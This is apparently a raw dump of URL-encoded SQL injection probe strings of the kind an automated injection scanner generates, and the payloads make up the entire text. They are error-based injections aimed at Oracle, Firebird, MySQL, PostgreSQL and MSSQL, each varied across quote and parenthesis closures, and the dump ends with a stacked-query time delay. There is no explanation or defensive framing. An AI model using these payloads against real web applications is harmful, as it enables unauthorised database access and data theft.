-3075%27%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27UFeW%27%3D%27UFeW -6517%27%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27tXxw%27%20LIKE%20%27tXxw -8948%27%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27UuvX%27%20LIKE%20%27UuvX -6526%27%29%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27QhDl%27%20LIKE%20%27QhDl -1218%27%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27JBtA%27%20LIKE%20%27JBtA -3929%22%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22nLfp%22%3D%22nLfp -2354%22%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22LYcd%22%3D%22LYcd -6554%22%29%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22NbIp%22%3D%22NbIp -7101%22%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%22wrux%22%3D%22wrux -6863%22%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%22chpJ%22%20LIKE%20%22chpJ -9907%22%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%22oLzY%22%20LIKE%20%22oLzY -9606%22%29%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%22wQwr%22%20LIKE%20%22wQwr -1212%22%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%22CaVV%22%20LIKE%20%22CaVV -2494%25%27%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 -2317%25%27%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 -6534%25%27%29%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -6216%25%27%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27%25%27%3D%27 -2128%00%27%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27NhSb%27%3D%27NhSb -5177%00%27%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%27QqwO%27%3D%27QqwO -8136%27%29%20WHERE%203320%3D3320%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -3107%22%29%20WHERE%202098%3D2098%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -2405%27%20WHERE%204796%3D4796%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -8532%22%20WHERE%205794%3D5794%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -5617%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 -5805%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%284256%3D4256 -1050%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%286124%3D6124 -1569%29%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%284398%3D4398 -7324%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 -9533%29%20WHERE%208481%3D8481%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 -7730%20WHERE%201371%3D1371%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 -1038%27%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 -9835%27%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 -1697%22%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29 -8179%27%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%27DELV%27%3D%27DELV -3651%27%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%27iVIs%27%3D%27iVIs -5395%27%29%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%27rwOs%27%3D%27rwOs -6182%27%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%27OFWj%27%3D%27OFWj -3809%27%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%27AxKJ%27%20LIKE%20%27AxKJ -7037%27%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%27VfYf%27%20LIKE%20%27VfYf -3798%27%29%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%27bKeC%27%20LIKE%20%27bKeC -5751%27%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%27emvI%27%20LIKE%20%27emvI -8396%22%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%22MSEe%22%3D%22MSEe -1731%22%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%22IYQw%22%3D%22IYQw -4896%22%29%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%22LrTa%22%3D%22LrTa -4231%22%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%22GYAl%22%3D%22GYAl -1981%22%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%22yDXt%22%20LIKE%20%22yDXt -7706%22%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%22ajBm%22%20LIKE%20%22ajBm -1246%22%29%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%22brgF%22%20LIKE%20%22brgF -8983%22%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%22begQ%22%20LIKE%20%22begQ -5057%25%27%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%27%25%27%3D%27 -6548%25%27%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%27%25%27%3D%27 -6626%25%27%29%29%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%27%25%27%3D%27 -4069%25%27%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%27%25%27%3D%27 -2984%00%27%29%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%27KKFY%27%3D%27KKFY -6362%00%27%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%27IgjU%27%3D%27IgjU -5785%27%29%20WHERE%204290%3D4290%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 -7168%22%29%20WHERE%202792%3D2792%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 -8479%27%20WHERE%204629%3D4629%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 -6521%22%20WHERE%209301%3D9301%20OR%209393%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%209393%20WHEN%209393%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 %28SELECT%206465%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%286465%3D6465%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 %28EXTRACTVALUE%288781%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288781%3D8781%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%29 %28UPDATEXML%289833%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%289833%3D9833%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C8706%29%29 %28CAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282136%3D2136%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%29 %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281799%3D1799%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%29 %28SELECT%20CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%281213%3D1213%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29 %28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289813%3D9813%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 %28SELECT%207602%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%207602%20WHEN%207602%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%29 1%2C%28SELECT%204981%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284981%3D4981%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%2CEXTRACTVALUE%288853%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288853%3D8853%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%2CUPDATEXML%284886%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284886%3D4886%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C7883%29 1%2C%28CAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288341%3D8341%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%29 1%2C%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%289630%3D9630%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%29 1%2C%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282092%3D2092%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 %28SELECT%20CONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%281000%3D1000%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 %28SELECT%20%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286295%3D6295%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 %28SELECT%20CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284051%3D4051%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29 %28SELECT%20CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282958%3D2958%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%20FROM%20DUAL%29 SELECT%20%27%3Ansk%3A%27%7C%7C%28SELECT%20%28CASE%20WHEN%20%284356%3D4356%29%20THEN%201%20ELSE%200%20END%29%29%7C%7C%27%3Abpy%3A%27 SELECT%20%27%3Ansk%3A%27%7C%7C%28CASE%207360%20WHEN%207360%20THEN%201%20ELSE%200%20END%29%7C%7C%27%3Abpy%3A%27%20FROM%20RDB%24DATABASE 1%29%3B%20SELECT%20SLEEP%285%29--%20 